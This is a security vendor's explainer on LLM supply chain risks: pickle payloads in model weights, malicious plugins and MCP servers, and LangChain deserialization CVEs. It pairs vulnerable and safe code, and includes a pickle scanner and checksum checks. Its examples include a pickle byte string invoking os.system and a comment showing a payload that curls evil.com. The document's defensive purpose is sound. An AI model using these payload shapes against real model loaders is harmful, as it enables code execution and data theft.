LLM05: Supply Chain Vulnerabilities

Verified by Precogs Threat Research

LLM supply chain vulnerabilities encompass risks from compromised model weights, poisoned pre-trained models on public repositories, malicious fine-tuning datasets, vulnerable LLM framework dependencies, and insecure plugins/extensions. Unlike traditional software supply chain attacks, LLM supply chain attacks can compromise the model's behavior without changing any application code.

Model Supply Chain Risks

The LLM supply chain has unique risks beyond traditional software:

  • Pre-trained model weights on the HuggingFace Hub can contain serialized Python objects (pickle) that execute arbitrary code on load.
  • Fine-tuning datasets from public sources can be poisoned.
  • LoRA adapters and model merges can introduce subtle backdoors.
  • GGUF/GGML quantized models can differ from the original in ways that aren't detectable by comparing outputs on test cases.
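
The pickle risk can be checked statically before any file is loaded. The sketch below, using only the standard library's pickletools, flags pickle streams that contain opcodes capable of importing or calling objects; it never unpickles the data. This mirrors what dedicated scanners do, except that real tools additionally allowlist known-safe globals (legitimate PyTorch checkpoints do reference `torch._utils` helpers), so treat this as an illustration, not a drop-in scanner:

```python
import io
import pickle
import pickletools

# Opcodes that import callables (GLOBAL/STACK_GLOBAL/INST/OBJ) or invoke
# them (REDUCE/NEWOBJ/NEWOBJ_EX) — the mechanism behind pickle payloads.
SUSPICIOUS_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",
}

def pickle_is_suspicious(data: bytes) -> bool:
    """Statically scan a pickle stream without ever deserializing it."""
    try:
        for opcode, _arg, _pos in pickletools.genops(io.BytesIO(data)):
            if opcode.name in SUSPICIOUS_OPCODES:
                return True
    except Exception:
        return True  # truncated or unparseable stream: treat as unsafe
    return False

# Classic protocol-0 payload shape: GLOBAL imports os.system, REDUCE calls it.
# We only parse these bytes; nothing is executed.
malicious = b"cos\nsystem\n(S'echo pwned'\ntR."
```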

Plugin and Extension Risks

LLM applications increasingly use plugins (ChatGPT Plugins, MCP servers, LangChain tools) that extend the model's capabilities. Malicious plugins can exfiltrate data from the conversation, execute arbitrary code on the host system, or manipulate the model's behavior through tool response injection. The MCP ecosystem is particularly vulnerable because servers run with the same privileges as the host application.
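
One practical control is to refuse to load any plugin or MCP server whose manifest has not been reviewed. A minimal sketch, assuming you keep a hash allowlist of manifests that passed review (`plugin_approved` and its parameters are illustrative names, not part of any plugin API):

```python
import hashlib

def plugin_approved(name: str, manifest: bytes, allowlist: dict) -> bool:
    """Load a plugin or MCP server only if its manifest bytes match
    the SHA-256 recorded when the plugin was last reviewed."""
    expected = allowlist.get(name)
    return (
        expected is not None
        and hashlib.sha256(manifest).hexdigest() == expected
    )
```

Because the hash covers the full manifest, a plugin that silently adds a new tool or changes a tool description after review fails the check and must be re-vetted.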

Framework Dependency Risks

LLM frameworks (LangChain, LlamaIndex, Transformers) are complex software with frequent CVEs. LangChain alone has had multiple critical deserialization vulnerabilities. A compromised transitive dependency can affect every application using the framework.

⚔️ Attack Examples & Code Patterns

Malicious model with pickle exploit

A HuggingFace model that executes code when loaded:

# ❌ VULNERABLE — loading unverified model with pickle
from transformers import AutoModel
# This model contains a crafted pickle payload
model = AutoModel.from_pretrained("random-user/helpful-model")
# On load, pickle.loads() executes: os.system("curl evil.com/steal")

# ✅ SAFE — use safetensors format, verify checksums
import os

from transformers import AutoModel

model = AutoModel.from_pretrained(
    "verified-org/model",
    use_safetensors=True,     # No code execution risk
    revision="abc123def",     # Pin to specific commit
    token=os.getenv("HF_TOKEN")
)
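
Pinning a revision fixes *which* bytes you fetch; verifying a checksum confirms the bytes you *got*. A minimal sketch of streaming SHA-256 verification against a hash published by the model's maintainers (function names here are illustrative):

```python
import hashlib

def sha256_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Stream-hash a large weights file without loading it into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_model_file(path: str, expected_sha256: str) -> None:
    """Fail closed if the downloaded artifact differs from the trusted hash."""
    actual = sha256_file(path)
    if actual != expected_sha256:
        raise RuntimeError(f"checksum mismatch for {path}: got {actual}")
```

Run the check in CI before the model ever reaches a deserializer, so a tampered artifact is rejected without being parsed.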

Compromised LangChain dependency

Outdated LangChain version with known deserialization CVE:

# ❌ VULNERABLE — old LangChain with CVE-2023-36188
# langchain==0.0.171 allows arbitrary code execution
# via crafted serialized chain
from langchain.chains import load_chain
chain = load_chain("malicious_chain.json")
# Executes arbitrary Python via __import__('os').system(...)

# ✅ SAFE — updated version with security patches
# langchain>=0.1.0 disables dangerous deserialization
# requirements.txt:
# langchain>=0.1.0
# langchain-community>=0.1.0
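
Pinning in requirements.txt can also be backed by a startup-time guard, so an application refuses to run with a framework version below a known-safe floor. A minimal sketch using only the standard library (the `MIN_SAFE` table is an example you would keep in sync with your CVE feed; real code should parse versions with the `packaging` library instead of this naive X.Y.Z parser):

```python
from importlib.metadata import PackageNotFoundError, version

def parse_version(v: str) -> tuple:
    """Naive X.Y.Z parser — sufficient for plain numeric versions only."""
    parts = []
    for p in v.split(".")[:3]:
        digits = "".join(ch for ch in p if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    return tuple(parts)

# Illustrative minimum safe versions, per the advisory above.
MIN_SAFE = {"langchain": "0.1.0", "langchain-community": "0.1.0"}

def unsafe_pins(min_safe: dict = MIN_SAFE) -> list:
    """Return installed packages sitting below their minimum safe version."""
    problems = []
    for pkg, floor in min_safe.items():
        try:
            installed = version(pkg)
        except PackageNotFoundError:
            continue  # not installed: nothing to flag
        if parse_version(installed) < parse_version(floor):
            problems.append(f"{pkg} {installed} < {floor}")
    return problems
```

Calling `unsafe_pins()` at startup and failing hard on a non-empty result turns a silent dependency downgrade into an immediate, visible error.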

🔍 Detection Checklist

  • Inventory all AI models, adapters, and quantized variants in use (AI-BOM)
  • Verify model checksums match trusted source (HuggingFace commit hash)
  • Prefer safetensors format over pickle-based formats (bin, pt)
  • Audit LLM framework dependencies for known CVEs weekly
  • Review MCP servers and plugins before installation
  • Monitor for unexpected model behavior changes after updates
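
The AI-BOM entry from the first checklist item can be as simple as one record per model artifact. The field names below are illustrative, not a standard schema (CycloneDX 1.5+ defines a standardized machine-learning BOM if you want an interoperable format); the values reuse the pinned-model example from earlier in this article:

```python
import json

# Illustrative AI-BOM record for one model artifact.
aibom_entry = {
    "component": "verified-org/model",
    "type": "model-weights",
    "format": "safetensors",
    "revision": "abc123def",          # pinned commit, as in the load example
    "sha256": "<published checksum>",  # placeholder: fill from trusted source
    "source": "https://huggingface.co/verified-org/model",
    "license": "apache-2.0",
}

print(json.dumps(aibom_entry, indent=2))
```

Regenerating and diffing these records on every deploy is what makes the "unexpected model behavior changes after updates" check actionable: a changed hash or revision shows up before the behavior does.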

🛡️ Mitigation Strategy

Verify model checksums and signatures before deployment. Use only models from trusted sources with known provenance. Pin dependency versions for LLM frameworks. Audit third-party plugins and MCP servers before installation. Maintain an AI Bill of Materials (AI-BOM) for all model components.


How Precogs AI Protects You

Precogs AI Binary SAST compares binary and model signatures against known-good builds to detect supply chain tampering. It scans LLM framework dependencies for CVEs and identifies compromised model files in your artifact pipeline.


What are LLM supply chain vulnerabilities?

LLM supply chain attacks compromise model weights, fine-tuning datasets, framework dependencies, or plugins rather than application code. Risks include pickle-based code execution in model files, poisoned training data, and vulnerable LLM framework versions. Prevention requires model verification, AI-BOM tracking, and safetensors format usage.

Protect Against LLM05: Supply Chain Vulnerabilities

Precogs AI automatically detects LLM05: Supply Chain Vulnerabilities and generates AutoFix PRs.